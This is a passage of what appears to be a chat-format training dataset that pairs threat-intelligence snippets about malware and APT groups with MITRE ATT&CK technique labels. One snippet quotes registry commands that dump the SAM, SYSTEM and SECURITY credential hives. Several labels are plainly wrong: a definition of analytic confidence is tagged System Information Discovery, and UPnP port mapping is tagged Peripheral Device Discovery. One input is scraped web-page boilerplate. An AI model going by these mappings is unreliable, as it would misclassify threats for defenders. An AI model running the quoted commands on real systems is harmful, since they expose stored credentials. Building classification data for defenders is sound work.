- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Axiom has used watering hole attacks to gain access."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It uses a GetCurrentProcessID to find the process ID of the current process. It compares the UniqueProcessID member of the SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX structure with the current process ID"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 obtained a KeePass database from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1555.005 - Password Managers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has cleared logs during post compromise cleanup activities."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Waterbear has used DLL side loading to import and load a malicious DLL loader."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used PowerShell scripts for execution, including use of a macro to run a PowerShell command to decode file contents."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the bot is running with a regular user privilege, persistence is established using the registry “Run” method. The loader DLL component is written to “%APPDATA%\\mswinload[.]dll” and a “mswinload” value is added to the “Run” key to execute ordinal #1 of the DLL with rundll32[.]exe"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encodes C2 traffic with Base64."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit can be used as a tool for the discovery of stored credentials. Specifically it supports the following modules which will check for credentials encrypted or plain-text in various files and in the registry"
- },
- {
- "role": "assistant",
- "content": "T1552.002 - Unsecured Credentials: Credentials in Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET uses AppleScript to check the host's language and location with the command \"user locale of (get system info)\"."
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The command index table and command handler address table. Implant Capabilities Based on the responses received from the control server, the malware can carry out the following malicious tasks: Recursively generate a list of files in a directory and send to the control server Terminate a specific process"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Both responses instruct the malware to download and load a remote plugin"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Actors likely used net share command to display information about shared resources on the local computer and decide which directories to exploit, the powershell dir command to map shared drives to a specified path and retrieve items from another, and the ntfsinfo command to search network shares on computers they have compromised to find files of interest. The actors used dir.exe to display a list of a directory's files and subdirectories matching a certain text string."
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VBShower has attempted to obtain a VBS script from command and control (C2) nodes over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aquatic Panda has deleted malicious executables from compromised machines."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XAgentOSX contains the deletFileFromPath function to delete a specified file using the NSFileManager:removeFileAtPath method."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST removed IFEO registry values to clean up traces of persistence."
- },
- {
- "role": "assistant",
- "content": "T1070.009 - Clear Persistence"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses tasklist /v to check running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 used the \"Get-ManagementRoleAssignment\" PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors used a variety of utilities, including publicly available versions of WinRAR® , to archive collected data with password protection."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BISCUIT uses SSL for encrypting C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Small Sieve can contact actor-controlled C2 servers by using the Telegram API over HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains keylogging functionality to steal passwords."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SHOTPUT is obscured using XOR encoding and appended to a valid GIF file."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It reads and executes commands from a text file stored in Mega cloud storage"
- },
- {
- "role": "assistant",
- "content": "T1530 - Data from Cloud Storage Object"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ember Bear had used `cmd.exe` and Windows Script Host (wscript) to execute malicious code."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Evilnum has deleted files used during infection."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EXOTIC LILY has copied data from social media sites to impersonate targeted individuals."
- },
- {
- "role": "assistant",
- "content": "T1593.001 - Social Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Its encoding method has been modified from time to time, aligned with major upgrade of PlugX itself"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a backup communication method with an HTTP beacon."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sibot has executed downloaded DLLs with \"rundll32.exe\"."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Two PDF files (***_SPE_LEOS and ***_HPC_SE) with aerospace & defense industry themed images, created via the Microsoft Print to PDF service, were submitted along with ***_ECS_EPM.docx. The naming convention of these PDF files was very similar to the malicious documents used. The name includes abbreviations for positions at the defense contractor much like the malicious documents. The Microsoft Print to PDF service enables content from a Microsoft Word document be printed to PDF directly. The PDFs were discovered in an archive file indicating that LinkedIn may have been a possible vector utilized by the adversaries to target victims. This is a similar vector as to what has been observed in a campaign reported by industry[7], however as mentioned earlier the research covered in this blog is part of a different activity set"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An downloader uses the Windows command \"cmd.exe\" /C whoami. The group also uses a tool to execute commands on remote computers."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This tool was originally intended to aid defenders in simulating obfuscated PowerShell commands to better their defenses"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream can monitor files for changes and automatically collect them."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideCopy has sent spearphishing emails with malicious hta file attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KernelCallbackTable is initialized to an array of callback functions when user32.dll is loaded into memory, which are used whenever a graphical call (GDI) is made by the process. To hijack the control flow, malware replaces the USER32. _fnDWORD callback in the table with the malicious WMIsAvailableOffline function. Once the flow is hijacked and malicious code is executed the rest of the code takes care of restoring the KernelCallbackTable to its original state"
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can retrieve system information, such as CPU speed, from Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak has copied legitimate service names to use for malicious services."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot collects email addresses from Outlook."
- },
- {
- "role": "assistant",
- "content": "T1087.003 - Email Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Low confidence generally means that the information's credibility and/or plausibility is questionable, or that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that [there are] significant concerns or problems with the sources"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can manipulate Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has registered multiple domains to facilitate payload staging and C2."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A gh0st RAT variant has used rundll32 for execution."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used keylogging tools called KEYPUNCH and LONGWATCH."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal has relied on users to execute malicious file attachments delivered via spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has a tool that exfiltrates data over the C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 contains a module for taking packet captures on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1040 - Network Sniffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OutSteel has used `cmd.exe` to scan a compromised host for specific file extensions."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands. The group has used an exploit toolkit known as Threadkit that launches .bat files."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CosmicDuke uses a keylogger."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT can use a legitimate process name to hide itself."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RDAT has used AES ciphertext to encode C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM used \"ipconfig /all\" to obtain information about the victim network configuration. The group also ran a modified version of NBTscan to identify available NetBIOS name servers."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to download files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leafminer used a tool called Total SMB BruteForcer to perform internal password spraying."
- },
- {
- "role": "assistant",
- "content": "T1110.003 - Brute Force: Password Spraying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CookieMiner has used a Unix shell script to run a series of commands targeting macOS."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors leveraged a custom tool to dump OS credentials and used following commands: `reg save HKLM\\\\SYSTEM system.hiv`, `reg save HKLM\\\\SAM sam.hiv`, and `reg save HKLM\\\\SECURITY security.hiv`, to dump SAM, SYSTEM and SECURITY hives."
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used Blogspot to host malicious content such as beacons, file exfiltrators, and implants."
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. Note: a file transfer is not necessary for a loss of credential information. Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. 1](link is external"
- },
- {
- "role": "assistant",
- "content": "T1187 - Forced Authentication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used C2 infrastructure to receive exfiltrated data."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT can map UPnP ports."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang uses command-line interaction to search files and directories."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If you continue browsing the site, you agree to the use of cookies on this website. If you continue browsing the site, you agree to the use of cookies on this website. Home - Explore Submit Search . - Upload - Login - Signup - Upload - Home - Explore - Login - Signup Activate your 30 day free trial to unlock unlimited reading. Facebook - Twitter - LinkedIn - Share - Email - - No Easy Breach DerbyCon 2016 . 22 . Share . Download to read offline . Every IR presents unique challenges. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it. All rights reserved.24 Our Response: Increased PowerShell Visibility • Upgraded the environment to PowerShell 3.0 and enabled logging • Logging captured input/output, variable initialization, etc. Captured entire functions of PS scripts, attacker commands, script output, etc. Wrote indicators based on observed attacker activity • Identified lateral movement, unique backdoors, credential theft, data theft, recon, persistence creation, etc. Unlimited Reading . Learn faster and smarter from top experts . Unlimited Downloading . Download to take your learnings offline and on the go . You also get free access to Scribd"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JCry has been observed deleting shadow copies to ensure that data cannot be restored easily."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volgmer stores the encoded configuration file in the Registry key \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Security\"."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to disable local firewall settings."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The \"tDiscoverer\" variant of HAMMERTOSS establishes a C2 channel by downloading resources from Web services like Twitter and GitHub. HAMMERTOSS binaries contain an algorithm that generates a different Twitter handle for the malware to check for instructions every day."
- },
- {
- "role": "assistant",
- "content": "T1102.003 - One-Way Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has exploited Microsoft Word vulnerability CVE-2014-4114 for execution."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HyperBro has the ability to download additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrowdStrike also identified a connection between StellarParticle-related campaigns and the abuse of Microsoft Cloud Solution Partners’ O365 tenants. This threat actor abused access to accounts in the Cloud Solution Partner’s environment with legitimate delegated administrative privileges to then gain access to several customers’ O365 environments"
- },
- {
- "role": "assistant",
- "content": "T1199 - Trusted Relationship"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
